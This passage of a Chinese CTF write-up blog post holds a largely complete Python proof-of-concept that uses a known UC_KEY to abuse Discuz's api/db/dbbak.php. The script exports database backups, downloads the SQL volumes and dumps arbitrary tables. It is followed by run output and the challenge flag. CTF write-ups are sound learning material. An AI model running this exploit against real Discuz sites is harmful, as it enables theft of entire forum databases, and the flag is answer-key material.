        tree = ET.fromstring(response_text)
    except ET.ParseError:
        return []
    names = []
    for entry in tree.findall('dir'):
        dirname_el = entry.find('dirname')
        if dirname_el is None or not dirname_el.text:
            continue
        # Normalise backslashes so the last component is found either way.
        normalized = dirname_el.text.strip().replace('\\', '/')
        names.append(normalized.rsplit('/', 1)[-1])
    return names

def view_backup_files(base_url: str, uc_key: str, sqlpath: str):
    """Call ``method=view`` for *sqlpath* and return every non-empty ``<file>/<file_url>`` value."""
    response_text, _ = call_db_api(base_url, uc_key, {'method': 'view', 'sqlpath': sqlpath})
    try:
        tree = ET.fromstring(response_text)
    except ET.ParseError:
        return []
    url_elements = (file_el.find('file_url') for file_el in tree.findall('file'))
    return [el.text.strip() for el in url_elements if el is not None and el.text]

def export_and_collect(base_url: str, uc_key: str, sqlpath: str = None, backupfilename: str = None):
    """Return download URLs of backup SQL files, reusing an existing backup when one is listed.

    Existing backups are tried in reverse name order and the first one with
    files is returned. Otherwise an export is started and its ``nexturl``
    chain is followed, collecting each reported ``file_url``.

    Raises:
        RuntimeError: a reply in the export chain yields no error code.
    """
    # Empty strings leave both names to the server.
    sqlpath = sqlpath or ''
    backupfilename = backupfilename or ''

    # Prefer an existing backup over triggering a heavy export.
    for candidate in sorted(list_backups(base_url, uc_key), reverse=True):
        found = view_backup_files(base_url, uc_key, candidate)
        if found:
            return found

    # Start the export (may be slow on a large database).
    export_request = {
        'method': 'export',
        'sqlpath': sqlpath,
        'backupfilename': backupfilename,
        'volume': 0,
        'tableid': 0,
        'startfrom': 0,
    }
    text, _ = call_db_api(base_url, uc_key, export_request)

    collected = []
    while True:
        code, _msg, nexturl, file_url = parse_xml_for_next_and_file(text)
        if code is None:
            raise RuntimeError('Invalid XML from server')
        if file_url:
            collected.append(file_url)
        if not nexturl:
            # No further step announced: the export chain is finished.
            break
        text = http_get(nexturl, timeout=90, retries=3).text
    return collected

def _decode_hex_tokens(s: str) -> str:
    # Replace 0x<hex> with its utf-8 decoded string (best-effort)
    def repl(m):
        hexstr = m.group(1)
        try:
            b = bytes.fromhex(hexstr)
            return b.decode('utf-8', errors='ignore')
        except Exception:
            return m.group(0)
    return re.sub(r"0x([0-9a-fA-F]+)", repl, s)

def extract_flag_from_sql(sql_text: str):
    # Look for INSERT INTO pre_a_flag ... VALUES (...)
    lines = [ln for ln in sql_text.splitlines() if 'INSERT INTO' in ln and 'pre_a_flag' in ln]
    if not lines:
        return None, None
    flag_pat = re.compile(r"\b(?:FLAG|flag|CTF)\{[^\}]*\}")
    for ln in lines:
        # Try decoded version first
        ln_dec = _decode_hex_tokens(ln)
        m = flag_pat.search(ln_dec)
        if m:
            return m.group(0), ln_dec
        # Fallback: try on raw line
        m = flag_pat.search(ln)
        if m:
            return m.group(0), ln
    # Last resort: pick first decoded quoted string
    decoded_join = '\n'.join(_decode_hex_tokens(ln) for ln in lines)
    m_all = re.findall(r"'([^']{4,})'", decoded_join)
    return (m_all[0] if m_all else None), (lines[0] if lines else None)

def _parse_create_table_columns(sql_text: str, table: str):
    # Extract column names from CREATE TABLE for given table
    # Return list of column names or empty list if not found
    pat = re.compile(r"CREATE\s+TABLE\s+`?" + re.escape(table) + r"`?\s*\(", re.IGNORECASE)
    m = pat.search(sql_text)
    if not m:
        return []
    start = m.end()
    # find matching closing paren
    depth = 1
    i = start
    while i < len(sql_text) and depth > 0:
        ch = sql_text[i]
        if ch == '(':
            depth += 1
        elif ch == ')':
            depth -= 1
        i += 1
    section = sql_text[start:i-1]
    cols = []
    for line in section.splitlines():
        line = line.strip()
        if not line or line.upper().startswith(('PRIMARY KEY', 'KEY', 'UNIQUE KEY', 'CONSTRAINT', 'FULLTEXT KEY')):
            continue
        mcol = re.match(r"`([^`]+)`\s+", line)
        if mcol:
            cols.append(mcol.group(1))
    return cols

def _sql_unescape(s: str) -> str:
    # Reverse of mysqli::escape_string for typical sequences
    # NOTE: Keep simple; handle \\ and \' and \n, \r, \t
    s = s.replace("\\'", "'")
    s = s.replace('\\"', '"')
    s = s.replace('\\n', '\n').replace('\\r', '\r').replace('\\t', '\t')
    s = s.replace('\\\\', '\\')
    return s

def _parse_values_tuple(valstr: str):
    """Split the inside of one ``VALUES (...)`` tuple into a list of Python values.

    Recognised forms: ``NULL`` (-> None), ``0x`` hex literals (-> UTF-8 decoded
    str), single-quoted strings (-> unescaped str), and anything else up to the
    next comma (-> stripped str).
    """
    # Parse a single parenthesized VALUES tuple content into a list of Python strings
    # Handles: 'quoted', 0xHEX, NULL, numbers
    out = []
    i, n = 0, len(valstr)
    def skip_ws(j):
        # Advance j past any whitespace and return the new index.
        while j < n and valstr[j].isspace():
            j += 1
        return j
    while i < n:
        i = skip_ws(i)
        if i >= n:
            break
        ch = valstr[i]
        # NULL
        if valstr[i:i+4].upper() == 'NULL':
            out.append(None)
            i += 4
        # 0x hex literal
        elif i+1 < n and valstr[i] == '0' and (valstr[i+1] in 'xX'):
            i += 2
            j = i
            # Consume the run of hex digits following the 0x prefix.
            while j < n and re.match(r'[0-9a-fA-F]', valstr[j]):
                j += 1
            hexstr = valstr[i:j]
            try:
                b = bytes.fromhex(hexstr)
                out.append(b.decode('utf-8', errors='ignore'))
            except Exception:
                # Undecodable hex (e.g. odd digit count) becomes an empty string.
                out.append('')
            i = j
        # quoted string
        elif ch == "'":
            i += 1
            buf = []
            while i < n:
                c = valstr[i]
                # Keep backslash pairs intact so an escaped quote does not end the string.
                if c == '\\' and i + 1 < n:
                    buf.append(valstr[i:i+2])
                    i += 2
                    continue
                if c == "'":
                    i += 1
                    break
                buf.append(c)
                i += 1
            out.append(_sql_unescape(''.join(buf)))
        else:
            # number or bareword until comma or end
            j = i
            while j < n and valstr[j] not in ',':
                j += 1
            token = valstr[i:j].strip()
            out.append(token)
            i = j
        # skip comma
        i = skip_ws(i)
        if i < n and valstr[i] == ',':
            i += 1
    return out

def dump_table_from_sqltexts(sql_texts, table: str):
    """Extract column names and inserted rows for ``table`` from SQL dump texts.

    Args:
        sql_texts: List of SQL file contents (one string per file).
        table: Name of the table whose rows should be collected.

    Returns:
        A ``(cols, rows)`` tuple. ``cols`` is the first truthy result of
        ``_parse_create_table_columns`` over the texts (otherwise whatever the
        last call returned, or ``[]`` when there are no texts). ``rows`` is a
        list with one parsed value list per matching
        ``INSERT INTO <table> VALUES (...);`` statement.

    Note:
        Statements are matched line by line, and everything between the first
        ``(`` after ``VALUES`` and the last ``);`` on the line is parsed as a
        single tuple.
    """
    cols = []
    for txt in sql_texts:
        cols = _parse_create_table_columns(txt, table)
        if cols:
            break

    ins_re = re.compile(
        r"INSERT\s+INTO\s+`?" + re.escape(table) + r"`?\s+VALUES\s*\((.*)\);",
        re.IGNORECASE,
    )
    rows = []
    for txt in sql_texts:
        for line in txt.splitlines():
            # The regex alone decides whether a line matches. A separate
            # case-sensitive substring pre-check would reject lines (e.g.
            # lowercase "insert into") that the IGNORECASE pattern accepts.
            m = ins_re.search(line)
            if m:
                rows.append(_parse_values_tuple(m.group(1)))
    return cols, rows

def dump_table_via_backup(base_url: str, uc_key: str, table: str):
    """Export a backup, download its volumes and dump one table from them.

    Args:
        base_url: Base URL of the target site, passed to ``export_and_collect``.
        uc_key: UC_KEY value, passed to ``export_and_collect``.
        table: Name of the table to extract.

    Returns:
        ``(None, None)`` when ``export_and_collect`` yields no URLs; otherwise
        the ``(cols, rows)`` tuple produced by ``dump_table_from_sqltexts``.
    """
    urls = export_and_collect(base_url, uc_key)
    if not urls:
        return None, None
    texts = []
    # Use the session as a context manager so its pooled connections are
    # released once all volumes have been fetched.
    with requests.Session() as sess:
        for u in urls:
            r = sess.get(u, timeout=90)
            if r.status_code != 200:
                # Best effort: skip volumes that could not be downloaded.
                continue
            # Strip the PHP guard line from the volume before parsing.
            texts.append(r.text.replace('# <?php exit();?>\n', ''))
    return dump_table_from_sqltexts(texts, table)

def main():
    """Command-line entry point of the PoC.

    With ``--dump-table`` the named table is dumped via
    ``dump_table_via_backup`` and printed as CSV-like lines. Without it, the
    backup volumes returned by ``export_and_collect`` are downloaded one by
    one and searched with ``extract_flag_from_sql``; the first flag found is
    printed and the function returns.
    """
    ap = argparse.ArgumentParser(description='Discuz dbbak export PoC to extract pre_a_flag')
    ap.add_argument('--base', required=True, help='Base URL of site, e.g. http://127.0.0.1')
    ap.add_argument('--key', required=True, help='UC_KEY')
    ap.add_argument('--dump-table', help='Dump all rows of the specified table (e.g., pre_a_flag)')
    args = ap.parse_args()

    if args.dump_table:
        print(f'[*] Dumping table: {args.dump_table}')
        cols, rows = dump_table_via_backup(args.base, args.key, args.dump_table)
        if rows is None:
            # (None, None) means no backup URLs were collected at all.
            print('[-] Failed to collect backup SQL files')
            return
        if not rows:
            print('[-] No rows found')
            return
        if cols:
            print('[+] Columns:', ', '.join(cols))
        else:
            print('[!] Column names not found; printing values by position')
        print('[+] Rows:')
        for i, r in enumerate(rows, 1):
            # Render row as CSV-like line
            rendered = []
            for v in r:
                if v is None:
                    rendered.append('NULL')
                else:
                    s = str(v)
                    # Quote values containing separators, quotes or newlines,
                    # doubling embedded double quotes.
                    if any(c in s for c in [',', '"', '\n', '\r']):
                        s = '"' + s.replace('"', '""') + '"'
                    rendered.append(s)
            print(f'   {i}: ' + ', '.join(rendered))
        return

    print('[*] Starting export via api/db/dbbak.php ...')
    files = export_and_collect(args.base, args.key)
    if not files:
        print('[-] No files collected')
        return
    print('[+] Collected files:')
    for u in files:
        print('   -', u)

    # Use the session as a context manager so its connections are released
    # on every exit path, including the early return when a flag is found.
    with requests.Session() as sess:
        for u in files:
            print('[*] Downloading', u)
            r = sess.get(u, timeout=90)
            if r.status_code != 200:
                print('   [-] HTTP', r.status_code)
                continue
            # Remove the guard line if present
            body = r.text.replace('# <?php exit();?>\n', '')
            flag, line = extract_flag_from_sql(body)
            if flag:
                print('[+] FLAG:', flag)
                if line:
                    print('[+] Source line:', line)
                return
    print('[-] Flag not found in collected volumes')

# Run the command-line entry point only when this file is executed as a script.
if __name__ == '__main__':
    main()

一开始犯蠢了:看到第一个字段是 flag{test_flag},还以为题目有问题,但其实真正的 flag 就在第二个字段里。脚本输出中包含了导出的 SQL 备份文件的地址,可以直接下载这个导出的 sql 文件:

[*] Starting export via api/db/dbbak.php ...
[+] Collected files:
   - http://challenge.xinshi.fun:45045/data/backup_250816_tJ8bkZ/250816_ef2rO5-1.sql 
[*] Downloading http://challenge.xinshi.fun:45045/data/backup_250816_tJ8bkZ/250816_ef2rO5-1.sql
[+] FLAG: flag{test_flag}
[+] Source line: INSERT INTO pre_a_flag VALUES ('1',flag{test_flag});

在下载的 sql 文件中可以得到以十六进制形式存储的数值,解码一下:

拿到flag:LILCTF{h4V3_Y0U_1oUNd_@_j#8_now?_h4HaH@}

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇